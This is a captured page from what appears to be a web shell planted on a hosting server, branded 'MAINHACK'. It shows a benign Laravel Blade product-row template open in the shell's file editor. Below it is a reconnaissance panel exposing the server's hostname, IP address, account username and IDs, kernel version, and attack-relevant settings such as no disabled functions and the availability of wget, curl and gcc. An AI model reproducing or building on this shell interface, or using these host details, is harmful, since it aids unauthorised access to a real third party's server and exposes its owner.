[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: combo_product_entry_row.blade.php
@php $quantity = isset($quantity) ? $quantity: 1; $multiplier = isset($multiplier) ? $multiplier: 1; $unit_id = isset($unit_id) ? $unit_id: null; @endphp @foreach($variations as $variation) <tr> <td class="text-center"> @if($product->type == 'variable') {{ $product->name }} ({{ $variation->name }}) - {{ $variation->sub_sku }} @else {{ $product->name }} - {{ $variation->sub_sku }} @endif <input type="hidden" name="composition_variation_id[]" value="{{ $variation->id }}"> </td> <td class="text-center"> {!! Form::text('quantity[]', @num_format($quantity), ['class' => 'form-control col-sm-12 input-sm quantity input_number mousetrap', 'required', 'style '=> "width: 77px"]); !!} @if(!empty($sub_units)) <br> <select name="unit[]" class="form-control input-sm sub_unit"> @foreach($sub_units as $key => $value) <option value="{{$key}}" data-multiplier="{{$value['multiplier']}}" @if($unit_id == $key) selected @endif > {{$value['name']}} </option> @endforeach </select> @else <input type="hidden" name="unit[]" value="{{$product->unit->id}}"> {{ $product->unit->short_name }} @endif </td> <td class="text-center"> <span class="purchase_price display_currency purchase_price_text" data-currency_symbol="true"> {{ $variation->default_purchase_price }} </span> <input type="hidden" class="purchase_price" value="{{ $variation->default_purchase_price }}"> </td> <td class="text-center"> <span class="item_level_purchase_price display_currency" data-currency_symbol="true"> {{$variation->default_purchase_price * $quantity * $multiplier}} </span> <input type="hidden" class="item_level_purchase_price" value="{{$variation->default_purchase_price * $quantity * $multiplier}}"> </td> <td class="text-center"> <span> <i class="fa fa-times remove_combo_product_entry_row text-danger" title="Remove" style="cursor:pointer;"></i> </span> </td> </tr> @endforeach
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285